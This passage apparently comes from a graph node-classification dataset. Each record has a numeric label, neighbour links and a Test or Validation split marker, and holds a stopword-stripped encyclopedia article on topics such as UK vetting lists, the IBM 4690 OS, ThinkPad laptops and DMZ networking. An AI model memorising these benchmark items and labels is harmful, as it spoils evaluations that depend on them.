'list 99 definition volunteer remains used crb volunteer person engaged activity involves spending time unpaid except travelling approved out-of-pocket expenses something aims benefit someone individuals groups addition close relatives aspects original design retained since singleton review isa owns maintains two lists one covering children sector one cover adults barred working vulnerable groups replaced previous barred lists list 99 protection children act 1999 poca scheme relating protection vulnerable adults pova disqualification orders inclusion barred lists result either automatic bar following police caution conviction following discretionary bar typically following dismissal resignation dismissal possible following act gross misconduct work although potential reasons secondary legislation decisions taken isa isa base decisions upon information range sources including limited held police locally police national computer local authorities social services regulatory organisations general medical council general teaching council england supervisory authorities ofsted also receive cases directly employers employer referrals constitute largest number cases considered discretionary barring receive cases directly individuals cases clear decisions escalated within isa final decisions made board chaired former chief executive barnardo roger singleton isa able consider information led cautions convictions include unproven allegations former employers professional bodies members public stories press however referral information allegations lead automatic inclusion isa barred lists barring decision made individual given information decision based opportunity explain case however hearing process caused controversy see case workers allowed undertake appropriate research internet chatrooms social networking websites although published guidance isa decision making process safeguarding vulnerable groups act 2006 state isa satisfied relevant conduct occurred able consider factor safeguarding vulnerable groups act 2006 defines relevant conduct philosophic burden proof whether event occurred balance probability used civil trials rather beyond reasonable doubt required criminal trials case assessment within risk factors obsession sex violence presence severe emotional loneliness and/or inability manage/sustain emotionally intimate relationships age-appropriate adults links anti-social peers presence impulsive chaotic unstable lifestyle using substances sex cope stress considered relation relevant conduct appeal inclusion means administrative court judicial review recent case demonstrates court minded de-register individual bar lawful disproportionate sb v independent safeguarding authority 2011 ukut 404 aac 04 october 2011 decision reflects similar decisions family criminal law regarding risk assessment conviction sexual offences isa barred lists performed separate albeit related role crb disclosure isa decision-making process considered information relating potential risk individual poses vulnerable groups using sources go beyond held police whereas crb disclosure may contain details offences may lead bar example drink driving may pertinent given role driving school bus isa-registration replace crb disclosures 2012 isa crb merged disclosure barring service dbs march 2009 elements vetting barring scheme begun rolled stages linked series pieces secondary legislation safeguarding vulnerable groups act 2006 isa came existence 2 january 2008 31 march 2008 isa began advising ministers barring decisions taken ministers current schemes 20 january 2009 barring decisions england wales began taken isa taking responsibility secretary state extended northern ireland 13 march 2009 20 february 2009 detailed guidance isa decision-making process published 12 october 2009 increased safeguards came effect around five million jobs voluntary positions – including national health service jobs – covered barring arrangements additional safeguards original intention 26 july 2010 new entrants roles working vulnerable groups switching jobs new provider within sectors would able register vbs assessed isa employers would able check registration status online subscribe notified employee registration status changes ability requirement register withdrawn 2011 following singleton munro reviews lists still maintained remains offence employ person regulated activity barred isa person seek work several prominent children authors – believed would required join scheme order conduct talks schools – criticised isa philip pullman called scheme outrageous demeaning insulting said would longer appear schools go school author illustrator talk class time else whole school earth – earth – world anybody going rape assault child circumstances preposterous author screenwriter frank cottrell boyce said author 're never alone class possible reason unless revenue-raising scam former children laureate anne fine said refuse – spoken schools without incident 32 years refuse undergo demeaning process part unhealthy situation 've got people close children seen potential paedophiles lindsay mackie representing literary charity english pen said signal children public space defined potentially dangerous space – values worlds visitors work whether writing engineering family secondary definition adult vetted safe – limiting fearful creating paranoia others questioned usefulness scheme pointing could prevented soham murders first place perpetrator ian huntley knew victims girlfriend job critical media coverage scheme launched 2009 led confusion registration requirements singleton review set due concerns expressed degree contact children trigger requirement register isa sir roger singleton chief adviser safety children chair isa produced ‘ drawing line ’ report check government drawn line right place relation requirement register december 2009 government accepted recommendations found ‘ drawing line ’ report included clarification number areas dcsf published vetting barring myth buster clarify requirements scheme however fact-sheet challenged rather simplistic one-sided several unions professional associations represent effected isa 2009 onwards organizations produced large amount documentation form statements conference resolutions advice either clarifying challenging isa publications referenced including written royal college nursing nurses union national union teachers nut national association schoolmasters union women teachers nasuwt unison union non-teaching staff schools even small sample responses different unions associations significant differences within opinions expressed positions adopted rcn specific branches nasuwt seemingly taking strongest oppositional stance perhaps indicates quite complex child protection debate uk currently 2010 government partly response pressure organizations mentioned launched second review isa led professor eileen munro department social policy london school economics political science lse following munro review 2011 requirement register withdrawn entirely also announced isa would merged crb 2012 isa role maintain lists accessed employers certain bodies barred working either children vulnerable adults changes extent brought end virulent press criticisms isa however also led deeper questioning thinking behind original creation isa specific accusations government overseen many changes reviews showing lack support organization isa initially created knee jerk reaction soham murders philip pullman remains one vociferous critics accusing government using soham murders 'scare story scare british public accepting intrusive database visible opposition isa came large nurses union royal college nursing rcn included successful legal cases brought rcn 2010 several journalists campaigning organizations continued voice criticism including 'civitas 'the manifesto club run journalist josie appleton criticisms concerns commonly raised regarding structure independent safeguarding authority included person barred without hearing minimum standard evidence legal support available 'minded bar right appeal limited single sanction barring 10 years anyone aged 25 refusal independent safeguarding authority use word 'sanction describe barring process formed basis rcn cases organizations continued question basis upon independent safeguarding authority created asking whether bureaucratic solution child protection issues realistic sensible isa accused vociferous critics broadsheets guardian 'unethical 'orwellian rcn campaigning groups ask whether creates problems creating 'climate fear amongst professionals simultaneously creating 'an illusion security amongst public general end pointed recent cases paedophile offences schools committed vanessa george plymouth – 2010 could prevented form database cases others like offender previous criminal disciplinary record debate seems likely continue especially neither pro anti viewpoint regarding expansion systems claimed political party conventional political standpoint right left",
    "neighbors": [
      8743
    ],
    "mask": "Test"
  },
  {
    "node_id": 5603,
    "label": 2,
    "text": "4690_Operating_System:4690 operating system 4690 operating system sometimes shortened 4690 os 4690 specially designed point sale operating system originally sold ibm however 2012 ibm sold retail business including product toshiba supports 4690 widely used ibm toshiba retail customers drive retail systems running applications well ibm application client server environment ace supermarket application sa general sales application gsa chain drug sales application cdsa follow-on product ibm 4680 os use ibm customers since 1986 original ibm 4680 os based digital research concurrent dos 286 system soon later renamed flexos 286 july 1993 ibm adopted flexos version 2.32 basis ibm 4690 os version 1 flexos 2.32 supported 286 386 modes limit applications running concurrently 1995 ibm licensed ims real/32 7.50 derivation digital research multiuser dos thereby successor concurrent dos 386 bundle 4695 pos terminals according year store ihl consulting group/ris news ibm 4690 os still market share 12 pos register/client market june 2005 ibm starting phase favour ibm retail environment suse ires ibm continued maintain 4690 os april 2015 recent version released ibm may 2012 ibm 4690 os version 6 release 3 supported 2017 special contracts big-name companies meanwhile toshiba released toshiba 4690 os version 6 release 4 v6r4 january 2014 well version 6 release 5 v6r5 january 2016 retailers using 4690 operating system operations many retail-specific reliability features addition running ibm hardware third-party vendors taken advantage 4690 features competitive hardware 4690 supports number point sale pos terminal devices store controller servers combination controller/terminals 4690 documentation contains list supported pos devices including devices use 20 years family ibm usb pos devices 4690 supports includes keyboards displays cash drawers 4690 also supports i/o devices designed conform ibm usb pos device interface specifications ibm makes interface specifications available third-party vendors enable connect devices pos terminals using rs485 rs232 usb connections ibm provides controller matrix document list compatible ibm servers use 4690 os store controllers controller/terminals servers represent current formerly available devices continue supported 4690 perhaps notable feature 4690 os ability provide redundancy infrastructure ibm designed 4690 os work either single server one 4690 servers servers commonly called store controllers connected lan 4690 store controllers provide redundant backup using mirrored data files using system master controller alternate master file server alternate file server designations controllers preserve data integrity allow file backup event store controller fails needs replaced copy 4690 os maintained store controller 4690 pos terminals registers load copy 4690 store controller memory initial program load ipl 4690 controllers provide terminal support form terminal loading price lookup transaction logging non-volatile memory utilized ensure data lost transit terminals store controller terminals assigned primary store controller controller typically backed another controller primary controller fails terminals automatically access backup controller providing uninterrupted sales pos terminal primary backup controllers unavailable terminal go standalone state applications capable supporting terminal offline tof state wherein terminals run offline using terminal-based item file logging stored within memory order maintain software store level 4690 os provides software maintenance facility manage updates facility provides checking ensure updates transferred store ability apply maintenance store level commands central control updated software applied test preserves prior software case maintenance needs backed reason 4690 supports communications store controller several forms including tcp/ip x.25 sna asynchronous communications following list commands supported 4690 operating system 4690 os updated annually address needs user community anticipation upcoming requirements 4690 version 5 incorporated new security enhancements ssh ipsec enhanced operator security allowing alphanumeric operator ids password complexity requirements password expiration etc. helped users address new security requirements credit card companies another recent addition 4690 capability forward store hardware- software-level events remote management system facilitate central control monitoring file integrity monitoring lockdown 4690s becoming increasingly important due recent breaches caused point-of-sale-malware based threats 4690 supports applications written ibm 4680 basic variant cbasic metaware high-c java 2 java language-based capability server client along extension tcp/ip capability client enables java applications server client run concurrently existing cbasic c applications users make functional enhancements existing applications developing new java application communicates existing application many documents could obtained ibm retail publications download center 2016 toshiba global commerce solutions current owner 4690 os removed public access 4690 related manuals publications servers",
    "neighbors": [
      10883,
      4996,
      6148,
      6276,
      7053,
      10561,
      6675,
      9619,
      9366,
      7319,
      2201,
      8729,
      11673,
      9628,
      6557,
      3359,
      10273,
      6442,
      5677,
      10030,
      7983,
      2045,
      9139,
      6325,
      11383,
      7356,
      573,
      6207,
      321,
      4546,
      1219,
      964,
      1221,
      6342,
      8262,
      8517,
      6985,
      9162,
      5067,
      6091,
      9927,
      341,
      1750,
      9946,
      10590,
      863,
      6624,
      3938,
      868,
      1253,
      1126,
      3429,
      5220,
      9829,
      10341,
      10482,
      5363,
      375,
      2168,
      6778,
      3323,
      2172,
      2813
    ],
    "mask": "None"
  },
  {
    "node_id": 5604,
    "label": 9,
    "text": "Brian_Silverman:brian silverman brian silverman canadian computer scientist creator many programming environments children researcher cellular automata silverman student massachusetts institute technology 1970s one creators tinkertoy computer played tic-tac-toe student mit silverman worked seymour papert papert founded logo computer systems inc. 1980 commercialize logo programming language silverman became director research later worked consulting scientist mit media lab ported logo programmable bricks precursor lego mindstorms one developers scratch programming language co-founder along paula bonta mitchel resnick president playful invention company headquartered montreal quebec canada develops programmable cricket spin-off media lab silverman part team reverse-engineered mos technology 6502 intel 4004 microprocessors developed transistor-level emulators ported spacewar one earliest digital computer games java writing another emulator pdp-1 game originally written also invented several well-known cellular automaton rules including brian brain seeds wireworld",
    "neighbors": [
      6594,
      5677,
      10173,
      7281,
      9975,
      7069
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5605,
    "label": 5,
    "text": "Shiira:shiira shiira シイラ japanese common dolphin-fish discontinued open source web browser mac os x operating system according lead developer makoto kinoshita goal shiira create browser better useful safari shiira used webkit rendering scripting project reached version 2.3 discontinued december 2011 developer website removed since browser developed safari mind main characteristics two browsers similar example shiira employs private browsing options history cookies recorded activated however search engines search field toolbar includes many search engines shiira also uses cocoa programming provide users customizable drawer extending left right window drawer includes bookmarks history downloads rss reader version 2.0 sidebar replaced series palettes opened closed main window toolbar shiira natively supports in-browser pdf viewing features shiira include appearance options users may switch aqua metal styles addition changing buttons appearances however current 2.0 release changes themes yet available tabs also customizable another option tab exposé acts much like exposé feature mac os x tab visible totality enabling users select tab wish navigate 1.x releases shiira also page-turning effect transitions two webpages however dropped 2.x releases new interface shiira 2.0 set display tabs thumbnails along bottom sides window latest release version 2.3 requires mac os x 10.4 later shiira 2.3 tested latest versions os reported buggy mac os x 10.5 10.6 final release mac os x 10.3 1.2.2",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      2076,
      9757,
      7713,
      10791,
      9770,
      559,
      9780,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      5205,
      6231,
      8281,
      2139,
      6747,
      6237,
      1642,
      9834,
      8303,
      9841,
      115,
      9843,
      4728,
      637,
      1664,
      2182,
      11418,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      10470,
      9451,
      11000,
      8443,
      9987,
      7943,
      278,
      7965,
      1834,
      7983,
      7488,
      10057,
      11082,
      2893,
      8557,
      6528,
      3971,
      3462,
      8584,
      4490,
      10126,
      7572,
      5026,
      4013,
      944,
      5054,
      6086,
      4048,
      5078,
      479,
      10722,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114
    ],
    "mask": "None"
  },
  {
    "node_id": 5606,
    "label": 3,
    "text": "ThinkPad_X_series:thinkpad x series thinkpad x series line notebook computers convertible tablets originally produced ibm marketed lenovo ibm announced thinkpad x series initially x20 september 2000 intention providing “ workers move better experience extra-thin extra-light mobile computing. ” thinkpad x series replaced 240 570 series ibm transition numbered letter series early 2000s first x series laptops slimmer deck cards lighter half-gallon milk despite presence 12.1-inch thin-film transistor tft lcd display design values—thin light—continued integral thinkpad x-series laptops design marketing even purchase ibm personal computing division lenovo first x series thinkpad released lenovo x41 2005 thinkpad x-series laptops lenovo described trusted reviews combining ultraportable weight form factor durable design x-series laptop styles include traditional ultraportables well convertible tablet designs according lenovo thinkpad x-series laptops include low power processors offer long battery life several durability features roll cage magnesium frame around display magnesium alloy covers spill-resistant keyboard currently lacks replaceable battery upgradable ram slots x20 first ibm/lenovo long standing x-series ultraportable line celeron-based configurations thinner case specifications x20 except optional 600 700mhz processor onboard ram could ordered new internal design slim-version dropped svga screen option dropped tualatin cpus faster radeon 7000 8mb gpu communications daughter card/cdc slot optional firewire and/or wifi models 133mhz fsb maximum ram increased 640mb x22 faster processors 800 866mhz bigger hard drives 30gb bluetooth ibm security sub system selected models x23 even faster processors 1.06 1.13ghz full-powered successor x2x line completely redesigned case however shared much technology 830mg chipset intel extreme graphics gpu maximum 1gb ram thanks two ram slots firewire standard models 60gb hard drives available additional secondary extended life battery could purchased x30 updated intel centrino platform pentium cpus faster ram ddr pc2100 better gpu ati radeon 7000 vram 16mb usb2.0 2nd usb port left side gigabit lan introduced models ibm security sub system models first model new thin light sub-line specifications three years release x30 upon acquiring thinkpad division lenovo released thinkpad x41 ultraportable laptop thinkpad x41 tablet x41 tablet convertible capacity function tablet pc ultraportable laptop x32 introduced 2005 numbering system irregular actually introduced x40 using older x3x chassis design also powerful x40 x41 units due use faster full-voltage dothan processors standard 2.5 5400/7200rpm hard drives short-lived model discontinued within months introduction model ibm included gigabit lan security sub system models x32 x41 two last ibm-designed thinkpads lenovo took x41 tablet designed lenovo x-series laptops released 2006 lenovo x60 x60s x60 tablet x60 x60s slimline differed primarily processors x60s low voltage processor x60 gave x60s lower active temperature longer battery life exchange reduced performance x60s also smaller heatsink slightly thinner case different battery form factor although could use standard x60 batteries plastic adapter review thinkpad x60/x60s notebook review called laptop hands best performing ultraportable market raising issues design lack optical drive two laptops available variety configurations later x60 models used 64-bit core 2 duo cpus x60s available lightweight lcd panel typical specifications laptops provided thinkpad x60 tablet praised reviewers laptop magazine said thinkpad x60 tablet raises bar business-class convertibles significant issue raised low capacity 4-cell battery provided battery life two hours x series laptops released lenovo 2007 x61 x61s x61 tablet x61 received mixed user reviews cnet users reporting display problems delivery delays others praised laptop performance portability reviewers however praised ultraportable notebook review called extremely fast ultraportable however criticized display colors viewing angles also pointed palm rest prone heating wireless networking card underneath x61s lauded excellent build quality performance long battery life battery improvement x41 model one last feature 43 aspect ratio display x60s models shipped intel core 2 duo l7300 clocked 1.40ghz l7700 clocked 1.80ghz 2018 still possible purchase new batteries spare parts laptops online retailers thinkpad x61 tablet also received positive reviews reviews saying build quality engineering second none shines tablet features executed something close genius however high price tag relatively inadequate performance criticized reviewer tabletpc review acknowledged sturdiness x61 tablet high battery life quality pen features met disfavor lack widescreen display brightness colors lack optical drive—although reviewer admitted absence helps reduce weight laptops released x series 2008 followed new naming conventions established lenovo x series laptops released lenovo 2008 x200 x200 tablet x300 thinkpad x200 released 15 july 2008 leveraged new technology x300 including options solid-state drive ssd optional integrated camera widescreen display optional 3g mobile broadband card new 9-cell battery extended running time 9.8 hours weight low intel core 2 duo cpu 2.66ghz one last models x-series able run libreboot free software bios replacement lenovo released x200s 23 september 2008 differed standard x200 lighter longer battery life running quietly due owl fan design cooling taken x300 x200s available half dozen different cpus three screen options top range wxga+ led-backlit tn panel x200s features cooler components made possible fan design modeled owl-wings however laptops touchpad trackpoint hdmi dvi displayport built-in optical drive x200 series included tablet pc models designated usage suffix primarily x230t lenovo released x200 tablet 9 september 2008 like tablet-designated models added convertible screen assembly containing touch digitizer pen buttons screen front operating device without access keyboard buttons converted mode codenamed kodachi x300 released distinguished ultraportable laptops use led backlighting removable battery solid-state drive integrated dvd burner thinkpad x300 used small form factor intel gs965 chipset instead standard gm965 chipset along intel core 2 duo l7100 low-voltage cpu 12w thermal design power tdp successor thinkpad x301 uses intel centrino 2 mobile platform gs45 chipset ultra-low-voltage ulv cpu also integrates gps wwan webcam top lid thickest part laptop thinnest part x300 original internal codename razor then-popular motorola razr flip phone lenovo noticed three technologies converging would make possible build thin light fast thinkpad first solid-state storage would replace mechanical hard drives second light-emitting diode led backlighting flat-panel displays would improve battery life image quality third ultrathin optical drives 7mm thick compared 9.5mm 12.7mm used previous thinkpads razor concept eventually merged bento-fly project renamed kodachi price time review notebook review extremely high indicated range corporate users laptop magazine awarded x300 laptop score 4.5 stars among highest thinkpad x-series laptop laptop less inch thick making thinnest thinkpad available time x300 laptop offered quick boot ssd also offered built-in optical drive uncommon thin light notebooks however laptop include sd card reader expansion dock capability expresscard pc card slot x-series laptops released 2010 lenovo x100e x201 x201s x201 tablet thinkpad x100e released 2010 engadget calling laptop perfect solution netbook larger 13- 14-inch ulv ultraportable available two colors heatwave red traditional thinkpad matte black design compared edge series deviated traditional thinkpad design x100e however despite choice colors retained angular edges boxy build scream traditional thinkpad design specifications x100e laptop given modified re-branded low-cost version lenovo x100e named mini 10 issued year 9 students nsw australia start 2010 featured intel atom n450 1.66 ghz processor 160gb hdd 2gb ram 10 1024×600 screen fitted 11.6 frame 0.3mp webcam windows 7 enterprise main 12-inch line-up received internal hardware update new palmrest touchpad x201i model version regular x201 core i3 cpu x201 tablet released 2010 criticized engadget lack durability protruding battery thick body praised performance notebook review similar views x201 tablet terms performance battery life indicating display superior x201 x201s thinkpad x-series laptops released 2011 lenovo x120e x220 x220i x220 tablet x1 thinkpad x120e released march 2011 laptop best affordable business ultraportable ces 2011 laptop specifications given thinkpad x220 released april 2011 new thinner latchless case 16:9 screen laptop magazine received x220 positively praised battery life performance low weight display keyboard significantly improved temperature control however web camera receive favor—while images crisp clear colors reported muted engadget said all-too-familiar thinkpad deceive boring business looks arguably one best laptops 've ever tested notebook review opinion stating thinkpad x220 quite simply best 12-inch business notebook 've reviewed far laptop specifications given x220i uses motherboard chipset standard x220 less powerful intel core i3 processor compared i5 i7 options available x220 another cost-reducing measure x220i offered ips display option x220 tablet also released april 2011 offered specifications x220 laptop terms processor graphics ram battery life x220 tablet nine hours 6-cell battery 18 hours external battery pack 6-cell battery starting weight tablet 3.88 lbs addition lightweight x series weighing 1.36 kg 1.72 kg depending configuration thinnest thinkpad laptop date 16.5 front 21.5 mm rear screen led-backlit hd infinity panel wxga resolution base configuration uses intel sandy bridge 2.5 ghz core i5-2520m 3.20 ghz 4 gb ram 8 gb sata ssd hard drive intel integrated hd graphics usb 3.0 backlit keyboard 802.11 b/g/n wifi average eight hours battery life battery internal removable optical drive thinkpad x1 laptop released lenovo may 2011 notebook review offered positive opinion thinkpad x1 saying powerful notebook combines durability features business-class thinkpad style consumer laptop 13.3 x1 thinkpad announced available uk june 7 2011 specifications thinkpad x1 laptop given thinkpad x-series laptops released 2012 lenovo x1 carbon x131e x230 x230t tablet w l series models thinkpad t430 t430s t530 w530 l430 l530 also released special edition laptop provided australian year 9 students part digital education revolution der program 2012 hardware specifications thinkpad x230 announced replaced earlier x220 x230 uses chassis introduced new chiclet-style 6-row keyboard replacing classic 7-row keyboard style ivy bridge processor first time x-series—usb 3.0 new keyboard design became controversial topic thinkpad community along locked bios discouraged third-party components including batteries wlan cards ivy bridge processors brought performance improvements compared x220 integrated intel hd graphics 4000 capable delivering good gaming experience 4x classic rts games maximum amount installable memory 16gb two memory slots allowing dual-channel ram like x220 possible use msata ssd within second mini pci express slot instead wwan card specifications x230i i3-equipped version regular x230 x230s asian-market model akin x240 instead x230 gained many design ques later found x240 line equipped intel 3rd gen ulv cpus thinkpad x230 tablet announced replaced earlier x220 tablet thinkpad x230t compatible previous series 3 docking stations 4337 4338 compatible ultrabase series 3 slice base x230t touchscreen stylus support whereas x230 touchscreen early august 2012 lenovo released first generation thinkpad x1 carbon announced ref name= release x1 carbon x230 x230t t430 t430s t530 w530 l430 l530 series 3/usb 3.0 dock /ref x1 carbon weighs battery life roughly eight hours start-up time less 20 seconds x1 carbon first released china popularity thinkpads market first x1 carbon featured m.2 ssd instead 2.5 hard drive bay base model 4gb memory intel core i5-3317u processor 128gb ssd expensive model intel core i7 processor 256gb ssd x1 carbon requires dongle connect ethernet cable models include 3g cellular modem first-generation x1 carbon tn-panel lcd display resolution 169 aspect ratio x1 carbon weighs measures x1 carbon case made light carbon fiber matte black finish carbon also marketed thinnest 14 ultrabook review published cnet dan ackerman wrote first glance thinkpad x1 carbon looks lot like thinkpads hand stands light portable excellent keyboard shows ultrabooks rugged build quality reassuring slightly boosted battery maybe lower starting price could serious contender all-around favorite thin laptop peter bright wrote disparaging review ars technica found new x1 carbon adaptive keyboard near perfect unusable keyboard non-standard compared desktop older thinkpad t410s lenovo helix keyboards touch typist despaired removal function keys layout cited repositioning caps lock key replacing home/end positioning backspace delete keys november 2012 lenovo announced touch-screen variant called thinkpad x1 carbon touch designed use windows 8 display makes use multi-touch technology detect simultaneous inputs ten fingers performance x1 carbon touch ssd engadget states machine boots start screen 11 seconds pretty typical windows 8 machine specs like also found solid-state drive delivers equally strong read write speeds 551mb/s 518mb/s respectively noticed last time tested ultrabook intel ssd thinkpad x series laptops released 2013 lenovo x240 x140e thinkpad helix convertible tablet thinkpad x240 replaced earlier x230 x230s compared x230 x240 changed higher-power intel core cpus labelled mobile class lower-power cpus labelled ultrabook class depending cpu model change resulted 10 –20 reduction cpu performance compared older higher power ivy bridge generation cpus first x-series laptop forgo classic trackpoint buttons favor touchpad also pushed x240 reduced maximum physical memory 8gb one memory slot making dual-channel unavailable compared 16gb dual-channel two memory slots x230 lost dedicated insert key volume control keys x240 uses rectangular slim tip power plug x240s slimmed lighter asian-market-only version x240 docking port missing power bridge hot-swappable battery replaced two internal batteries rated 23.5wh extension removes option install larger 6-cell batteries place default 3-cell thinkpad helix released option corporate buyers looking power high-end ultrabook mobility tablet thinkpad helix featured tablet powered ivy bridge components docking keyboard wacom digitizer stylus x131e laptop designed education market comes three versions chrome os windows dos durable case fitted rubber bumpers thickened plastic case components improve durability display panel resolution anti-glare coating customized various colors school logos asset tagging x131e comes several processor versions intel celeron/core i3 amd e1/e2 models basically x130e including sim card slots cellular network access including wireless wan wwan cards x131e last thinkpad classic round power plug thinkpad x series laptops released 2015 lenovo third-generation x1 carbon x250 ces congress thinkpad x250 broadwell processor x250 saw return separate trackpoint buttons one ram slot touch screen available model x250 uses rectangular power plug thinkpad x series laptops released 2016 lenovo ces congress replaced earlier thinkpad x250 thinkpad x260 adopts skylake processors adds additional usb 3.0 port usb-c missing replaces vga port hdmi port addition existing mini displayport port lenovo claims x260 achieve battery life 21.5 hours full charge first generation x1 yoga released 2016 featuring touchscreen 360-degree hinge unlike many laptops x1 series features stylus dedicated slot like many others x1 series x1 yoga features built-in fingerprint sensor multiple usb ports hdmi port support intel i7 processors thinkpad x1 tablet modular device uses lenovo calls ultra connect system tie together removable modules extra battery pack pico projector 3d camera detachable keyboard etc x1 tablet powered intel core m7 processor paired 16gb memory solid state drives 1tb capacity x1 tablet 12-inch multi-touch screen resolution 32 aspect ratio thinkpad x270 announced december 2016 tn ips displays available hd fhd well fhd touch screen option lenovo claims x270 achieve 20 hours battery life full charge includes one usb-c port supporting usb 3.1 gen 1 speed 5gbit/s pd charging via usb-c hdmi two usb type-a 3.0 ports one always allowing users charge items plugged laptop asleep first x line feature charging docking usb-c thunderbolt unlike previous models series soldered ram non-removable battery built-in rj45 ethernet port although one available via extension cable users contended eliminates several central appeals x2* series effectively represents replication lenovo existing lines rather true continuation series update x280 case screen x390 amd processor",
    "neighbors": [
      3586,
      5386,
      9611,
      271,
      4886,
      4259,
      5681,
      5939,
      2383,
      5073,
      9057,
      5606,
      1000,
      3304,
      5481,
      1005,
      2165,
      4217,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 5607,
    "label": 8,
    "text": "SimilarWeb:similarweb similarweb website provides web analytics services businesses company offers customers information clients competitors website traffic volumes referral sources including keyword analysis website stickiness e.g. time site page views bounce rate among features like alexa internet extrapolates data panel web users allow monitor internet activity combined direct observations subset internet properties websites traffic statistics 2019 claimed world largest panel hundreds millions users company founded 2007 offer tel-aviv israel 2009 similarweb first israeli seedcamp attracting attention international media investors company raised series round 1.1 million investment led yossi vardi docor international management similarsites browser extension help users find sites similar visiting launched later year september 24 2013 company closed 6 million series b round led david alliance moshe lichtman participation existing investor docor international management february 24 2014 south africa media giant naspers invested 18 million similarweb leading series c round within month similarweb used part capital acquisition israeli early-stage company tapdog million dollars shares cash less year tapdog founded november 2014 raised 15 million series investment july 2015 similarweb acquired personalized content discovery platform developer swayy december 10 2015 similarweb announced acquired quettra silicon valley-based mobile intelligence startup boost mobile operations quettra provided personalization tools developers return detailed mobile telemetry data july 2017 company announced 47 million round financing led viola growth saban ventures participation ce ventures existing investors",
    "neighbors": [
      235,
      8735,
      6576,
      1943,
      4605,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 5608,
    "label": 4,
    "text": "DMZ_(computing):dmz computing computer security dmz demilitarized zone sometimes referred perimeter network screened subnet physical logical subnetwork contains exposes organization external-facing services untrusted network usually larger network internet purpose dmz add additional layer security organization local area network lan external network node access exposed dmz rest organization network firewalled dmz functions small isolated network positioned internet private network design effective allows organization extra time detect address breaches would penetrate internal networks name term demilitarized zone area states military operations permitted dmz seen belonging either party bordering concept applies computing use metaphor dmz example acting gateway public internet neither secure internal network insecure public internet case hosts vulnerable attack provide services users outside local area network e-mail web domain name system dns servers increased potential hosts suffering attack placed specific subnetwork order protect rest network become compromised hosts dmz permitted limited connectivity specific hosts internal network content dmz secure internal network similarly communication hosts dmz external network also restricted make dmz secure internet suitable housing special purpose services allows hosts dmz communicate internal external network intervening firewall controls traffic dmz servers internal network clients another firewall would perform level control protect dmz external network dmz configuration provides additional security external attacks typically bearing internal attacks sniffing communication via packet analyzer spoofing e-mail spoofing also sometimes good practice configure separate classified militarized zone cmz highly monitored militarized zone comprising mostly web servers similar servers interface external world i.e internet dmz contain sensitive information accessing servers within lan like database servers architecture dmz usually application firewall ftp cmz hosts web servers database servers could cmz lan separate vlan altogether service provided users external network placed dmz common services web servers communicate internal database require access database server may publicly accessible may contain sensitive information web servers communicate database servers either directly application firewall security reasons e-mail messages particularly user database confidential typically stored servers accessed internet least insecure manner accessed email servers exposed internet mail server inside dmz passes incoming mail secured/internal mail servers also handles outgoing mail security compliance legal standards hipaa monitoring reasons business environment enterprises install proxy server within dmz following benefits reverse proxy server like proxy server intermediary used way around instead providing service internal users wanting access external network provides indirect access external network usually internet internal resources example back office application access email system could provided external users read emails outside company remote user would direct access email server reverse proxy server physically access internal email server extra layer security particularly recommended internal resources need accessed outside worth noting design still allows remote potentially malicious users talk internal resources help proxy since proxy functions relay non-trusted network internal resource may also forward malicious traffic e.g application level exploits towards internal network therefore proxy attack detection filtering capabilities crucial preventing external attackers exploiting vulnerabilities present internal resources exposed via proxy usually reverse proxy mechanism provided using application layer firewall focuses specific shape contents traffic rather controlling access specific tcp udp ports packet filter firewall would reverse proxy usually good substitute well thought dmz design rely continuous signature updates updated attack vectors many different ways design network dmz two basic methods single firewall also known three legged model dual firewalls architectures expanded create complex architectures depending network requirements single firewall least 3 network interfaces used create network architecture containing dmz external network formed isp firewall first network interface internal network formed second network interface dmz formed third network interface firewall becomes single point failure network must able handle traffic going dmz well internal network zones usually marked colors -for example purple lan green dmz red internet often another color used wireless zones secure approach according colton fralick use two firewalls create dmz first firewall also called front-end perimeter firewall must configured allow traffic destined dmz second firewall also called back-end internal firewall allows traffic dmz internal network setup considered secure since two devices would need compromised even protection two firewalls provided two different vendors makes less likely devices suffer security vulnerabilities example security hole found exist one vendor system less likely occur one one drawbacks architecture costly purchase manage practice using different firewalls different vendors sometimes described component defense depth security strategy home routers refer dmz host which—in many cases—is actually misnomer home router dmz host single address e.g. ip address internal network traffic sent otherwise forwarded lan hosts definition true dmz demilitarized zone since router alone separate host internal network dmz host able connect hosts internal network whereas hosts within real dmz prevented connecting internal network firewall separates unless firewall permits connection firewall may allow host internal network first requests connection host within dmz dmz host provides none security advantages subnet provides often used easy method forwarding ports another firewall nat device tactic establishing dmz host also used systems interact properly normal firewalling rules nat forwarding rule formulated ahead time varying tcp udp port numbers example opposed fixed number fixed range also used network protocols router programming handle 6in4 gre tunnels prototypical examples",
    "neighbors": [
      6541,
      3473,
      10518,
      4504,
      10232,
      8998,
      9766,
      7089,
      1208,
      9276,
      11198,
      10433,
      4163,
      836,
      7364,
      2118,
      2375,
      2887,
      4806,
      2558,
      6232,
      3930,
      9440,
      225,
      11502,
      10226,
      245,
      4725,
      119,
      6262,
      5246
    ],
    "mask": "None"
  },
  {
    "node_id": 5609,
    "label": 2,
    "text": "CEN/XFS:cen/xfs cen/xfs xfs extensions financial services provides client-server architecture financial applications microsoft windows platform especially peripheral devices eftpos terminals atms unique financial industry international standard promoted european committee standardization known acronym cen hence cen/xfs standard based wosa extensions financial services wosa/xfs developed microsoft move standardized software base financial institutions increasingly interested ability pick choose application programs drive equipment xfs provides common api accessing manipulating various financial services devices regardless manufacturer chronology wosa/xfs changed name simply xfs standard adopted international cen/isss standards body however commonly called cen/xfs industry participants perceived benefit xfs similar java write run anywhere mantra often different hardware vendors different interpretations xfs standard result differences interpretation means applications typically use middleware even differences various platforms implementation xfs notable xfs middleware platforms include xfs test tools allow testing xfs applications middleware simulated hardware tools include sophisticated automatic regression testing capabilities providers xfs test tools include j/xfs alternative api cen/xfs windows specific also xpeak operating system independent based xml messages j/xfs written java objective provide platform agnostic client-server architecture financial applications especially peripheral devices used financial industry eftpos terminals atms move standardized software base financial institutions increasingly interested ability pick choose application programs drive equipment j/xfs provides common object oriented api pure java application wide range financial devices providing layer separation application device logic implemented using native j/xfs api wrapping existing implementation javapos 